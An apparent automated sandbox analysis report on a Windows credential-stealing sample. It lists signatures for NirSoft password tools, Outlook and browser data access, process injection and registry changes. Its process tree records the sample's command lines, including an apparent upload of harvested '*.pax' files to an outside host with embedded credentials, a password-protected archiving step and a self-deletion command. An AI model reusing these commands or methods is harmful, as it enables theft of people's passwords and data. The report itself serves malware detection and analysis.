Analysis
max time kernel: 108s
max time network: 140s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 07/09/2024, 07:48
Static task: static1
Behavioral task: behavioral1
  Sample: d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
  Resource: win10v2004-20240802-en
General
Target: d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Size: 1.0MB
MD5: d16ce7cf123a64124e62853b6334fb85
SHA1: dffee691c7c1010c8a410057ebdce003631055bc
SHA256: e58c7afbf68aa6364b320af12e3fb65df7c53b534f30c5d1de60c63bfe4fc37e
SHA512: 1f29aa8b81eaf72f4f05e37c200d1be4acb1c3d050951e0783b6e7ff8de17983b2bf1338107bcf03766f353e40c809a7dca90abc403e2af5dd1a2f99b2bfdb1b
SSDEEP: 24576:W6Fv2eEgqRryI/iN3czSX+2RSSeqSE6EbwWFxI8yA/q24io3:lF+JJyyP+2McGPn/U
Malware Config
Signatures
Detected Nirsoft tools 16 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource | yara_rule
behavioral2/memory/2376-33-0x0000000000400000-0x0000000000416000-memory.dmp | Nirsoft
behavioral2/memory/2948-39-0x0000000000400000-0x0000000000415000-memory.dmp | Nirsoft
behavioral2/memory/2948-38-0x0000000000400000-0x0000000000415000-memory.dmp | Nirsoft
behavioral2/memory/2376-32-0x0000000000400000-0x0000000000416000-memory.dmp | Nirsoft
behavioral2/memory/4244-27-0x0000000000400000-0x0000000000418000-memory.dmp | Nirsoft
behavioral2/memory/4244-26-0x0000000000400000-0x0000000000418000-memory.dmp | Nirsoft
behavioral2/memory/3964-16-0x0000000000400000-0x0000000000431000-memory.dmp | Nirsoft
behavioral2/memory/3964-15-0x0000000000400000-0x0000000000431000-memory.dmp | Nirsoft
behavioral2/memory/4460-13-0x0000000000400000-0x000000000041D000-memory.dmp | Nirsoft
behavioral2/memory/4460-12-0x0000000000400000-0x000000000041D000-memory.dmp | Nirsoft
behavioral2/memory/4200-11-0x0000000000400000-0x000000000043D000-memory.dmp | Nirsoft
behavioral2/memory/4200-10-0x0000000000400000-0x000000000043D000-memory.dmp | Nirsoft
behavioral2/memory/3892-19-0x0000000000400000-0x000000000041B000-memory.dmp | Nirsoft
behavioral2/memory/3892-18-0x0000000000400000-0x000000000041B000-memory.dmp | Nirsoft
behavioral2/memory/2928-42-0x0000000000400000-0x0000000000425000-memory.dmp | Nirsoft
behavioral2/memory/2928-41-0x0000000000400000-0x0000000000425000-memory.dmp | Nirsoft
NirSoft MailPassView 2 IoCs
Password recovery tool for various email clients
resource | yara_rule
behavioral2/memory/4460-13-0x0000000000400000-0x000000000041D000-memory.dmp | MailPassView
behavioral2/memory/4460-12-0x0000000000400000-0x000000000041D000-memory.dmp | MailPassView
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
resource | yara_rule
behavioral2/memory/4200-0-0x0000000000400000-0x000000000043D000-memory.dmp | upx
behavioral2/memory/3892-1-0x0000000000400000-0x000000000041B000-memory.dmp | upx
behavioral2/memory/3964-6-0x0000000000400000-0x0000000000431000-memory.dmp | upx
behavioral2/memory/4460-4-0x0000000000400000-0x000000000041D000-memory.dmp | upx
behavioral2/memory/2928-20-0x0000000000400000-0x0000000000425000-memory.dmp | upx
behavioral2/memory/4244-25-0x0000000000400000-0x0000000000418000-memory.dmp | upx
behavioral2/memory/2376-33-0x0000000000400000-0x0000000000416000-memory.dmp | upx
behavioral2/memory/2948-39-0x0000000000400000-0x0000000000415000-memory.dmp | upx
behavioral2/memory/2948-38-0x0000000000400000-0x0000000000415000-memory.dmp | upx
behavioral2/memory/2948-37-0x0000000000400000-0x0000000000415000-memory.dmp | upx
behavioral2/memory/2948-35-0x0000000000400000-0x0000000000415000-memory.dmp | upx
behavioral2/memory/2376-32-0x0000000000400000-0x0000000000416000-memory.dmp | upx
behavioral2/memory/2376-31-0x0000000000400000-0x0000000000416000-memory.dmp | upx
behavioral2/memory/2376-29-0x0000000000400000-0x0000000000416000-memory.dmp | upx
behavioral2/memory/4244-27-0x0000000000400000-0x0000000000418000-memory.dmp | upx
behavioral2/memory/4244-26-0x0000000000400000-0x0000000000418000-memory.dmp | upx
behavioral2/memory/2928-24-0x0000000000400000-0x0000000000425000-memory.dmp | upx
behavioral2/memory/4244-22-0x0000000000400000-0x0000000000418000-memory.dmp | upx
behavioral2/memory/3892-17-0x0000000000400000-0x000000000041B000-memory.dmp | upx
behavioral2/memory/3964-16-0x0000000000400000-0x0000000000431000-memory.dmp | upx
behavioral2/memory/3964-14-0x0000000000400000-0x0000000000431000-memory.dmp | upx
behavioral2/memory/3964-15-0x0000000000400000-0x0000000000431000-memory.dmp | upx
behavioral2/memory/4460-13-0x0000000000400000-0x000000000041D000-memory.dmp | upx
behavioral2/memory/4460-12-0x0000000000400000-0x000000000041D000-memory.dmp | upx
behavioral2/memory/4200-11-0x0000000000400000-0x000000000043D000-memory.dmp | upx
behavioral2/memory/4200-10-0x0000000000400000-0x000000000043D000-memory.dmp | upx
behavioral2/memory/4460-9-0x0000000000400000-0x000000000041D000-memory.dmp | upx
behavioral2/memory/3892-19-0x0000000000400000-0x000000000041B000-memory.dmp | upx
behavioral2/memory/3892-18-0x0000000000400000-0x000000000041B000-memory.dmp | upx
behavioral2/memory/4200-7-0x0000000000400000-0x000000000043D000-memory.dmp | upx
behavioral2/memory/2928-42-0x0000000000400000-0x0000000000425000-memory.dmp | upx
behavioral2/memory/2928-41-0x0000000000400000-0x0000000000425000-memory.dmp | upx
behavioral2/memory/792-62-0x0000000000400000-0x0000000000410000-memory.dmp | upx
behavioral2/memory/792-65-0x0000000000400000-0x0000000000410000-memory.dmp | upx
behavioral2/memory/792-66-0x0000000000400000-0x0000000000410000-memory.dmp | upx
behavioral2/memory/792-64-0x0000000000400000-0x0000000000410000-memory.dmp | upx
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Suspicious use of SetThreadContext 10 IoCs
description | pid | Process | procid_target
PID 4224 set thread context of 4200 | 4224 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe | 87
PID 4224 set thread context of 3892 | 4224 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe | 88
PID 4224 set thread context of 4460 | 4224 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe | 89
PID 4224 set thread context of 3964 | 4224 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe | 90
PID 4224 set thread context of 2928 | 4224 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe | 91
PID 4224 set thread context of 4244 | 4224 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe | 92
PID 4224 set thread context of 2376 | 4224 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe | 93
PID 4224 set thread context of 2948 | 4224 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe | 94
PID 4224 set thread context of 3156 | 4224 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe | 102
PID 4224 set thread context of 792 | 4224 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe | 106
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | IEXPLORE.EXE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Modifies Internet Explorer settings
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\VersionManager | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31129850" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames | iexplore.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | iexplore.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\IESettingSync | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2040308672" | IEXPLORE.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001bc9387f4f791b45af7c7e57591307f100000000020000000000106600000001000020000000f2e3985b818279c2356c014814f18e401a3fb550035ee5fccc6d79e5171c8f17000000000e800000000200002000000074101991ccaa80fe71941d38b762fd231f3126b581587e9b70d06a0a9cb2392e200000007f6cfe363b4172771838fc563f0d0397ca04488518db141acbeb67f6fca58bed400000009d67c4d9a44b7d34792cee372d4f6d31bf9c3984fffd611c7650f886a7c5b68d980b70f9c4af34462e14b45b3bfe80381d7f4a8aad350d11d9972c9809abf467 | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "432460315" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{A50FFC2E-6CED-11EF-BB4F-CA89CBF88D4A} = "0" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2038902334" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | iexplore.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | iexplore.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31129850" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\GPU | IEXPLORE.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" | IEXPLORE.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001bc9387f4f791b45af7c7e57591307f100000000020000000000106600000001000020000000d7d7389d88680012c2abac64e04c729202870ecc4f5028ccb882422c00a01835000000000e8000000002000020000000c81d7b630e273286c6eda3307ed3fb642ee96c9ae9b6432bf1dc7318045cadd520000000bc5f834e1cc66a7d2dbdd361aeddf3c3015b0c6f2a93a942239960ea80f601a0400000007f1d09e875f535e89e27f186f02fa76375393fa2492ec182d87a319a85198bf4dbbfb38e00533a21a510995a5c2490ec55093857811fb445cea827189e060fa9 | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31129850" | IEXPLORE.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 200a607afa00db01 | iexplore.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2038902334" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\VersionManager | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | iexplore.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 1036677afa00db01 | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | iexplore.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid | Process
4224 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
4224 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
2928 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
2928 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs
description | pid | Process
Token: SeDebugPrivilege | 3892 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Token: SeRestorePrivilege | 3892 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Token: SeBackupPrivilege | 3892 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Token: SeDebugPrivilege | 2928 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe

Suspicious use of FindShellTrayWindow 1 IoCs
pid | Process
496 | iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs
pid | Process
496 | iexplore.exe
496 | iexplore.exe
4852 | IEXPLORE.EXE
4852 | IEXPLORE.EXE
4852 | IEXPLORE.EXE
4852 | IEXPLORE.EXE

Suspicious use of WriteProcessMemory 61 IoCs
(identical rows are grouped; the "entries" column gives how many times each row appears in the report)
description | pid | Process | procid_target | entries
PID 4224 wrote to memory of 4200 | 4224 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe | 87 | 5
PID 4224 wrote to memory of 3892 | 4224 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe | 88 | 5
PID 4224 wrote to memory of 4460 | 4224 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe | 89 | 5
PID 4224 wrote to memory of 3964 | 4224 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe | 90 | 5
PID 4224 wrote to memory of 2928 | 4224 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe | 91 | 5
PID 4224 wrote to memory of 4244 | 4224 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe | 92 | 5
PID 4224 wrote to memory of 2376 | 4224 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe | 93 | 5
PID 4224 wrote to memory of 2948 | 4224 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe | 94 | 5
PID 4224 wrote to memory of 3156 | 4224 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe | 102 | 5
PID 4224 wrote to memory of 792 | 4224 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe | 106 | 5
PID 4224 wrote to memory of 496 | 4224 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe | 107 | 2
PID 496 wrote to memory of 4852 | 496 | iexplore.exe | 108 | 3
PID 792 wrote to memory of 1208 | 792 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe | 109 | 3
PID 4224 wrote to memory of 4964 | 4224 | d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe | 110 | 3
Processes (indentation shows the parent/child depth of the process tree)

C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe"
  PID: 4224
  - Checks computer location settings
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
      Command line: "d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" /stab rundll32_1.sys
      PID: 4200
      - System Location Discovery: System Language Discovery

    C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
      Command line: "d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" /stab rundll32_2.sys
      PID: 3892
      - System Location Discovery: System Language Discovery
      - Suspicious use of AdjustPrivilegeToken

    C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
      Command line: "d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" /stab rundll32_3.sys
      PID: 4460
      - Accesses Microsoft Outlook accounts
      - System Location Discovery: System Language Discovery

    C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
      Command line: "d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" /stab rundll32_4.sys
      PID: 3964
      - System Location Discovery: System Language Discovery

    C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
      Command line: "d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" /stab rundll32_5.sys
      PID: 2928
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
      Command line: "d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" /stab rundll32_7.sys
      PID: 4244
      - System Location Discovery: System Language Discovery

    C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
      Command line: "d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" /stab rundll32_8.sys
      PID: 2376
      - System Location Discovery: System Language Discovery

    C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
      Command line: "d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" /stab rundll32_9.sys
      PID: 2948
      - System Location Discovery: System Language Discovery

    C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
      Command line: "d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" a -ppEsTs}eLdS54 rundll32.dat rundll32_*
      PID: 3156
      - System Location Discovery: System Language Discovery

    C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe"
      PID: 792
      - Checks computer location settings
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7EA.tmp\ren.bat" "
          PID: 1208
          - System Location Discovery: System Language Discovery

    C:\Program Files\Internet Explorer\iexplore.exe
      Command line: "d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" -u pompei -p 123123 -DD -F -P 443 livesecureupdate.com /sys *.pax
      PID: 496
      - Modifies Internet Explorer settings
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory

        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:496 CREDAT:17410 /prefetch:2
          PID: 4852
          - System Location Discovery: System Language Discovery
          - Modifies Internet Explorer settings
          - Suspicious use of SetWindowsHookEx

    C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c dir && dir && del "C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe"
      PID: 4964
      - System Location Discovery: System Language Discovery
Network
MITRE ATT&CK Enterprise v15
Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize: 471B
MD5: ba1bf8cf86ec57057637af172911cd13
SHA1: 32daf654da1afadd3021d486164516318295debf
SHA256: 77fb6880c4ae2e78d705501c19c9cd4a4d3d2f9e42d45e313561caa0b6c832e0
SHA512: 46780dd891659bde9eb87f07c857a43de3de9eccc53077b437282d1dd0c1339321399b0faa4cc2a6534396cdd4d358209bfe1f9622bda1e5681acef2b9c4a255

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize: 404B
MD5: fe4e490beb62b9a4a3bf9b199dbea324
SHA1: 0a05740d27d0aac8c798fe72924a5fcc4543ea2e
SHA256: de0f251d1587eea1d80aea8a148a7829304ee442fb33f0f8c7125c62bd5f0901
SHA512: e7a21bd78d5974838020d2c942b878f9a60e92e1258e98db18c97d91ba2056ed23c58610a609c4d60192e123653c27517ed898c8f7e70a64fede5510a8fca242

Filesize: 4KB
MD5: 1c6af8ea6bc8f76f6f337c650d2ef7b7
SHA1: 9aaff38f63296e43090517f1da994c8c2d5422a9
SHA256: 9cf5d24df85889746f26e73d489693a65dab79fc519c95be64bcdc2b2ca82b6a
SHA512: 540dff05dcd82bb350f5c36f1b0c1d870f0fb5966c67c4b8f424a8184f96f1cbba0ed56c254f90072e4be42e802147294d91d0f20571feb52aba3075d6a9bd36

Filesize: 4KB
MD5: d24a03830318cf195ba065c94c8e12a7
SHA1: 6c7174cda4dc233b5d8d8bdf02c3423471e608f6
SHA256: b088185bad4043457014cece747bf9cf9b185dd02a443f150a5157ae7ce5784e
SHA512: cba665b829e7934c145bac967d49c701a7e74afa27b01be04359f9d941347c18111e6daaa01f3a50caebebf9e87a9a3031cecc6e7c08d6c600410efc6559044d

Filesize: 17KB
MD5: 5a34cb996293fde2cb7a4ac89587393a
SHA1: 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256: c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512: e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

Filesize: 57B
MD5: 97b2de650ff2e2112fbca643c7e69e0f
SHA1: 556323bba3c43d1526e5ee23f73899f454282afa
SHA256: 9d24f2630f43ffea0c8c64826c52bd2ebaf1107cb5bb1e7e99c048437281a00b
SHA512: e1972690c69ea16396235deef404d95e5219cfda389c4cc610fec28bf55aceed45bf0ed315aec69a299bfc7d34d25d73680ddcccbc3111d8d6484c00135c8b02

Filesize: 386B
MD5: 1218902428c2e28154d20738abfd9fcd
SHA1: e776d349025239339d7bb87f27f45bce657fd330
SHA256: d5ed9261184e58dfcdd6c94a4bb58e4e7dc95861695d8e330e43ea157f26761a
